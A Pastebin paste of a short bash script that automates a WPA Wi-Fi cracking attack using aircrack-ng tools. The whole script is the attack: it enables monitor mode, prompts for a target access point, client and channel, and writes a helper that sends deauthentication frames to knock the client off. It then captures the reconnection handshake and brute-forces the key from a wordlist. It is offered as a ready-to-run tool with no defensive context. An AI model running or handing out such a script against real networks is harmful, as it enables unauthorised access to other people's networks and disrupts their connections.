Guest User

Untitled

a guest
May 23rd, 2018
82
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.69 KB | None | 0 0
  1. #!/bin/bash
  2.  
  3. # start in monitor mode
  4. airmon-ng start wlan0
  5.  
  6. # dump all traffic data
  7. airodump-ng wlan0mon
  8.  
  9. # start capturing packets, looking for deauth
  10. # -c channel of AP
  11. # --bssid router to crack i.e., AP
  12. echo "Enter AP: "; read AP
  13. echo "Enter Client: "; read CL
  14. echo "Enter channel: "; read CH
  15.  
  16.  
  17. cat > deauth.sh <<EOF
  18. #!/bin/bash
  19. aireplay-ng -0 1 -a "$AP" -c "$CL" wlan0mon
  20. EOF
  21.  
  22. chmod +x deauth.sh
  23.  
  24. # save packets dump in .cap file, press ctrl+c when a handshake is captured.
  25. # On parallel execute ./deauth.sh to manually force clients to re-auth.
  26. airodump-ng -c "$CH" --bssid "$AP" -w psk wlan0mon
  27.  
  28. # Crack from password list
  29. aircrack-ng -w testPass.lst -b "$AP" psk*.cap
  30.  
  31. # stop
  32. airmon-ng stop wlan0mon
Add Comment
Please, Sign In to add comment